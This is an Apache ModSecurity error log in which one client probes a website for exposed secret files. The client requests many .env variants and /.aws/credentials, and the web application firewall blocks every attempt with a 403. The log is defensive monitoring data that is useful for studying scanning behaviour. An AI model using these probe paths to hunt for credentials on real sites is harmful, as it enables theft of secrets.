[Tue May 27 15:08:10.998200 2025] [:error] [pid 3435307] [client 185.146.232.218:33532] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envlive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envlive"] [unique_id "aDW5Ov8iIWre8jY-cNxR2AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:10.998572 2025] [:error] [pid 3435307] [client 185.146.232.218:33532] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envlive"] [unique_id "aDW5Ov8iIWre8jY-cNxR2AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:10.998742 2025] [:error] [pid 3435307] [client 185.146.232.218:33532] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envlive"] [unique_id "aDW5Ov8iIWre8jY-cNxR2AAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:24.336131 2025] [:error] [pid 3434646] [client 185.146.232.218:32502] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envbackup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envbackup"] [unique_id "aDW5SABjkyyU9gihc4sPAgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:24.336488 2025] [:error] [pid 3434646] [client 185.146.232.218:32502] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envbackup"] [unique_id "aDW5SABjkyyU9gihc4sPAgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:24.336667 2025] [:error] [pid 3434646] [client 185.146.232.218:32502] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envbackup"] [unique_id "aDW5SABjkyyU9gihc4sPAgAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:29.333251 2025] [:error] [pid 3434642] [client 185.146.232.218:61976] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envlocal"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envlocal"] [unique_id "aDW5TfoteRZm3UET_KXStQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:29.333765 2025] [:error] [pid 3434642] [client 185.146.232.218:61976] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envlocal"] [unique_id "aDW5TfoteRZm3UET_KXStQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:29.334000 2025] [:error] [pid 3434642] [client 185.146.232.218:61976] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envlocal"] [unique_id "aDW5TfoteRZm3UET_KXStQAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:44.528596 2025] [:error] [pid 3435311] [client 185.146.232.218:45140] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envback"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envback"] [unique_id "aDW5XMcVU5YaHAERsMJjYgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:44.528959 2025] [:error] [pid 3435311] [client 185.146.232.218:45140] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envback"] [unique_id "aDW5XMcVU5YaHAERsMJjYgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:44.529118 2025] [:error] [pid 3435311] [client 185.146.232.218:45140] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envback"] [unique_id "aDW5XMcVU5YaHAERsMJjYgAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:49.159403 2025] [:error] [pid 3435315] [client 185.146.232.218:39360] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envbk"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envbk"] [unique_id "aDW5YYMZxRfo8GmAcSTjWQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:49.159807 2025] [:error] [pid 3435315] [client 185.146.232.218:39360] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envbk"] [unique_id "aDW5YYMZxRfo8GmAcSTjWQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:08:49.159982 2025] [:error] [pid 3435315] [client 185.146.232.218:39360] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envbk"] [unique_id "aDW5YYMZxRfo8GmAcSTjWQAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:04.318921 2025] [:error] [pid 3435316] [client 185.146.232.218:19412] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envdocker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envdocker"] [unique_id "aDW5cCw1TIthxW7dZehD6AAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:04.319286 2025] [:error] [pid 3435316] [client 185.146.232.218:19412] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envdocker"] [unique_id "aDW5cCw1TIthxW7dZehD6AAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:04.319459 2025] [:error] [pid 3435316] [client 185.146.232.218:19412] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envdocker"] [unique_id "aDW5cCw1TIthxW7dZehD6AAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:23.659870 2025] [:error] [pid 3435313] [client 185.146.232.218:24170] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envproduction"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envproduction"] [unique_id "aDW5gxc-bm3P_kMSA92eIQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:23.660211 2025] [:error] [pid 3435313] [client 185.146.232.218:24170] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envproduction"] [unique_id "aDW5gxc-bm3P_kMSA92eIQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:23.660377 2025] [:error] [pid 3435313] [client 185.146.232.218:24170] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envproduction"] [unique_id "aDW5gxc-bm3P_kMSA92eIQAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:39.798571 2025] [:error] [pid 3435308] [client 185.146.232.218:37082] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envdevelopment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envdevelopment"] [unique_id "aDW5kxpsgQ-cVRubiE_pJAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:39.798900 2025] [:error] [pid 3435308] [client 185.146.232.218:37082] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envdevelopment"] [unique_id "aDW5kxpsgQ-cVRubiE_pJAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:39.799075 2025] [:error] [pid 3435308] [client 185.146.232.218:37082] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envdevelopment"] [unique_id "aDW5kxpsgQ-cVRubiE_pJAAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:59.527799 2025] [:error] [pid 3435317] [client 185.146.232.218:55342] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envdev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envdev"] [unique_id "aDW5p34CeMAvTJAIhKuk2gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:59.528158 2025] [:error] [pid 3435317] [client 185.146.232.218:55342] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envdev"] [unique_id "aDW5p34CeMAvTJAIhKuk2gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:09:59.528367 2025] [:error] [pid 3435317] [client 185.146.232.218:55342] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envdev"] [unique_id "aDW5p34CeMAvTJAIhKuk2gAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:10.042095 2025] [:error] [pid 3434646] [client 185.146.232.218:45122] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envtest"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envtest"] [unique_id "aDW5sgBjkyyU9gihc4sPAwAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:10.042506 2025] [:error] [pid 3434646] [client 185.146.232.218:45122] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envtest"] [unique_id "aDW5sgBjkyyU9gihc4sPAwAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:10.042698 2025] [:error] [pid 3434646] [client 185.146.232.218:45122] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envtest"] [unique_id "aDW5sgBjkyyU9gihc4sPAwAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:15.195076 2025] [:error] [pid 3434642] [client 185.146.232.218:45138] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envold"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envold"] [unique_id "aDW5t_oteRZm3UET_KXStgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:15.195403 2025] [:error] [pid 3434642] [client 185.146.232.218:45138] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envold"] [unique_id "aDW5t_oteRZm3UET_KXStgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:15.195574 2025] [:error] [pid 3434642] [client 185.146.232.218:45138] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envold"] [unique_id "aDW5t_oteRZm3UET_KXStgAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:34.064253 2025] [:error] [pid 3435311] [client 185.146.232.218:41140] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envbak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envbak"] [unique_id "aDW5yscVU5YaHAERsMJjYwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:34.064590 2025] [:error] [pid 3435311] [client 185.146.232.218:41140] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envbak"] [unique_id "aDW5yscVU5YaHAERsMJjYwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:10:34.064774 2025] [:error] [pid 3435311] [client 185.146.232.218:41140] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envbak"] [unique_id "aDW5yscVU5YaHAERsMJjYwAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:11:35.262275 2025] [:error] [pid 3434642] [client 185.146.232.218:47180] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aDW6B_oteRZm3UET_KXStwAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:11:35.262626 2025] [:error] [pid 3434642] [client 185.146.232.218:47180] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aDW6B_oteRZm3UET_KXStwAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:11:35.262797 2025] [:error] [pid 3434642] [client 185.146.232.218:47180] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aDW6B_oteRZm3UET_KXStwAAAAA"], referer: https://economiasolidale.38121.it/
